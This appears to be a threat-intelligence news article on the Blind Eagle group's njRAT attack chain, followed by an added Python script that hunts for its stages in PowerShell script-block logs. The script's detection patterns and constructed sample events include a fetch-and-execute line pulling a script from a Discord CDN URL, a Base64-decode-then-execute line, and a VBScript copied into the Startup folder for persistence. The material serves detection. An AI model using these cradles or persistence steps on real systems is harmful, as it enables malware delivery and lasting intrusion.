The cyberespionage group Blind Eagle, also tracked as APT-C-36, has been using a new multi-stage attack chain to deploy the njRAT remote access trojan, The Hacker News reports.
The chain starts with a JavaScript downloader that fetches and executes a PowerShell script hosted on Discord's CDN, according to a ThreatMon report. That script drops a second PowerShell script and a Windows batch file, and writes a VBScript file to the Windows Startup folder so the infection survives reboots. When the VBScript runs, it launches the batch file, which deobfuscates and runs a PowerShell script that finally delivers njRAT.
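The chain described above gives a defender three observables: a PowerShell stage fetched from Discord's CDN, script blocks that download and execute in memory or decode Base64 before execution, and a VBScript file dropped in the per-user Startup folder. The Python below is an added example written for this article, not code from ThreatMon, SC Media or The Hacker News. The PowerShell script-block log messages (Event ID 4104) are constructed, and the regexes are generic patterns for those behaviours rather than indicators taken from the report; the Discord CDN hostname and the Startup folder path are public facts.

```python
"""Hunt for the Blind Eagle njRAT chain stages in PowerShell script-block logs.

Added example; the log messages below are constructed, not real telemetry.
"""
import os
import re

# One regex per observable stage of the chain. Hostnames and paths are public
# facts; nothing here is an indicator lifted from the report.
PATTERNS = {
    # Stage-2 PowerShell hosted on Discord's CDN
    "discord_cdn": re.compile(r"https?://cdn\.discordapp\.com/attachments/\S+", re.I),
    # Anything that pulls more content from the network
    "remote_download": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    # Fileless execution of whatever was fetched or decoded
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    # Deobfuscation step before the final PowerShell stage
    "base64_decode": re.compile(r"FromBase64String|-enc(odedcommand)?\b", re.I),
    # VBScript written into the per-user Startup folder for persistence
    "startup_persistence": re.compile(
        r"(Start Menu\\Programs\\Startup\\|GetFolderPath\(['\"]?Startup['\"]?\)).*?\.vbs",
        re.I | re.S),
}


def classify_script_block(text: str) -> list[str]:
    """Return the sorted stage tags matched by one 4104 script-block message."""
    return sorted(tag for tag, rx in PATTERNS.items() if rx.search(text))


def is_suspicious(tags: list[str]) -> bool:
    """Persistence or a Discord-hosted payload is enough on its own. Otherwise
    require in-memory execution combined with a download or a Base64 decode;
    a plain download (e.g. Invoke-WebRequest -OutFile) is not flagged alone."""
    tagset = set(tags)
    if tagset & {"discord_cdn", "startup_persistence"}:
        return True
    return "in_memory_exec" in tagset and bool(tagset & {"remote_download", "base64_decode"})


def scan_events(events) -> list[tuple[str, list[str]]]:
    """events: iterable of (event_id, message). Returns (message, tags) for
    every 4104 script block that is_suspicious() flags."""
    findings = []
    for event_id, message in events:
        if event_id != 4104:  # only PowerShell script-block logging events
            continue
        tags = classify_script_block(message)
        if is_suspicious(tags):
            findings.append((message, tags))
    return findings


def vbs_in_listing(names) -> list[str]:
    """Filter a Startup-folder directory listing to VBScript files
    (.vbs, plus .vbe for the encoded variant)."""
    return sorted(n for n in names if n.lower().endswith((".vbs", ".vbe")))


# Constructed sample script-block messages (event_id, message); not real logs.
SAMPLE_EVENTS = [
    (4104, "$u='https://cdn.discordapp.com/attachments/111/222/stage2.ps1';"
           "IEX (New-Object Net.WebClient).DownloadString($u)"),
    (4104, "Copy-Item .\\run.vbs \"$env:APPDATA\\Microsoft\\Windows\\Start Menu"
           "\\Programs\\Startup\\run.vbs\""),
    (4104, "Get-ChildItem C:\\Users | Measure-Object"),
    (4104, "Invoke-WebRequest https://example.org/tool.zip -OutFile tool.zip"),
    (4104, "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b)))"),
    (4103, "IEX something"),  # wrong event type, skipped
]

if __name__ == "__main__":
    for message, tags in scan_events(SAMPLE_EVENTS):
        print(tags, "<-", message[:70])
    # On a live Windows host, also list VBScript in the real per-user Startup folder.
    startup = os.path.join(os.environ.get("APPDATA", ""), "Microsoft", "Windows",
                           "Start Menu", "Programs", "Startup")
    if os.path.isdir(startup):
        print("VBScript in Startup:", vbs_in_listing(os.listdir(startup)))
```

Run as a script it prints the three flagged blocks from the constructed sample (the Discord download, the Startup-folder copy, and the Base64-decode-then-IEX block) and leaves the benign directory listing and the plain file download alone; feed it real 4104 messages exported from the PowerShell operational log to hunt on a host.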
"njRAT, also known as Bladabindi, is a remote access tool (RAT) with a user interface, or trojan, which allows the holder of the program to control the end user's computer," said ThreatMon.
Blind Eagle was earlier reported by Check Point and BlackBerry to have used spear-phishing to deliver the BitRAT and AsyncRAT malware.